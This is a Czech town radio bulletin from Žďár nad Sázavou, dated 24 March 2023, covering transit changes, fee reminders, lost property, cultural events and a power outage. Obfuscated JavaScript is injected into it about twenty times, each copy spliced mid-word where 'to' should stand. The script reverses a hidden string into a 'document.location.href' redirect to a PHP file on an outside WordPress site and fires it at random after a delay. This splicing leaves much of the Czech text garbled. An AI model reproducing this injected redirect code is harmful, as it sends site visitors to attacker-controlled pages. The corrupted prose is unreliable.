Rainbow page separator

Hlášení městského rozhlasu vysílaného dne 24. března 2023

Pátek, 24. března 2023

Z ÚŘADU:

Odbor komunálních služeb oznamuje, že v souvislosti s úplnou uzavírkou ulice Jamská bude do 30. dubna 2024 včetně zrušena bez náhrady zastávka MHD Novoměstská pro linku č. 3.

Vedení MHD:

– linka č. 3 bude vedena přes propojku ulic Novoměstská a Jamská v nové průmyslové zóně, nejbližší zastávka je Neumannova.

Dále odbor komunálních služeb oznamuje, že v souvislosti s úplnou uzavírkou části komunikace v Nákupním parku na ulici Brněnská bude do odvolání, nejdéle však do 30. dubna 2024 včetně, zrušena bez náhrady zastávka MHD Brněnská Nákupní park.

Nebližší zastávka:

– Brněnská policie pro směr z au$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tobusového nádraží 

– Jihlavská ZDAR pro směr na au$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tobusové nádraží

Podle průběhu stavebních prací a situace na stavbě je možné dočasné obnovení obsluhy zastávky Brněnská Nákupní park, informace budou vždy v předstihu zveřejněny na dotčené zastávce a webech města a dopravce. Děkujeme za pochopení.

Změna tarifu MHD Žďár

 Od 1. dubna 2023 dochází k částečné změně ceníku městské hromadné dopravy. Ceník nově motivuje cestující k bezho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovostním platbám. Jízdné placené bankovní kar$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou bude stát nově 10 Kč nebo 5 Kč za snížené jízdné. Platba ho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tově se naopak zvyšuje na 16 Kč nebo 8 Kč za snížené jízdné. Beze změny zůstávají ceny všech druhů časových kuponů, občanský, studentský i zlevněný na měsíc, čtvrtletí nebo rok. Bezho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovostní platby jsou nově výhodnější a urychlují odbavení u řidiče. Více na webu dopravce www.mhdzdar.cz.  

Odbor majetkoprávní,

upozorňuje na úhradu nájemného za rok 2023 za pronájem pozemků ve vlastnictví města Žďáru nad Sázavou pod řadovými Prefa garážemi a za zahrádky u by$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tových domů, které je splatné každoročně vždy do 31. března na účet města Žďáru nad Sázavou s uvedením variabilního symbolu a jména nájemce a adresy bydliště. Úhradu je možno zaplatit také na pokladně MěÚ v ho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovosti nebo platební kar$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou. Případné dotazy a informace poskytne Marie Dvořáková, tel. 566688171.

Upozorňujeme držitele psů,

 že se blíží splatnost poplatku, který má být uhrazen do 31. března. Poplatek můžete uhradit bankovním převodem na účet města pod přiděleným variabilním symbolem, nebo ho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tově na pokladně městského úřadu. Úhradu lze provést i platební kar$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou. 

Bližší informace poskytne Miroslava Zachová na tel. čísle 566 688 147 nebo jsou k dispozici na webových stránkách města. 

ZTRÁTY A NÁLEZY:

Městský úřad, odbor finanční oznamuje, že na ztráty a nálezy byly předány svazky klíčů, peněženka bez dokladů + ho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovost. Seznam všech nalezených věcí je zveřejněn na úřední desce i na facebooku města. Bližší informace Vám poskytne Alena Benešová na tel. čísle 566 688 146 nebo osobně v kanceláři, 1. patro, dveře č. 35 – ztráty a nálezy. 

 

VYHLÁŠENÉ ZÁMĚRY:

 

KULTURNÍ POZVÁNKY:

Knihovna Matěje Josefa Sychry Vás zve na výstavu fo$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tografií Pavla Remara - Dvorečky a Dvorky starého Žďáru, která je umístěna v Čechově domě do konce dubna 2023. Dále pak až do konce dubna 2023 je možné v Galerii u Sychry zhlédnout výstavu fo$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tografií Jaroslava Provazníka – Místa, co určitě znáte. 

V Regionálním muzeu na Tvrzi probíhá do 24. dubna 2023 výstava Retrohrátky. K vidění budou hračky éry socialismu a také interaktivní dětská herna. Uvidíte například Rubikovu kostku, plechovou berušku na klíček nebo céčka a některé věci si budete moct i vyzkoušet. Více informací najdete na webu muzea www.muzeumzdar.cz nebo na Facebooku.

Knihovna Matěje Josefa Sychry pořádá pro učitele základních a středních škol akredi$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovaný seminář s Vladimírem Trojánkem: Cesta českého spisovatele do 21. s$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toletí. Ten se uskuteční ve čtvrtek 29. Března 2023 v 17:00 hod. v přednáškovém sále knihovny. Přihlášky odesílejte na odc@knihzdar.cz nebo telefonicky na 566 621 883.

Ve čtvrtek 29. Března 2023 od 9:00 hod. bude probíhat v přednáškovém sále knihovny Alzheimer poradna Vysočina. Konzultace je třeba si předem objednat. Více informací naleznete na webových stránkách www.knihzdar.cz

 

VÝLUKY:

EG.D, a. s. oznamuje přerušení dodávky elektrické energie dne 27. března 2023 v době od 7:30 do 14:30 hodin na ul. Žitná č. o. 6 až 26 sudá, č. o. 5 až 17 lichá a dále na ul. Na Prutech č. o. 7 až 21 lichá.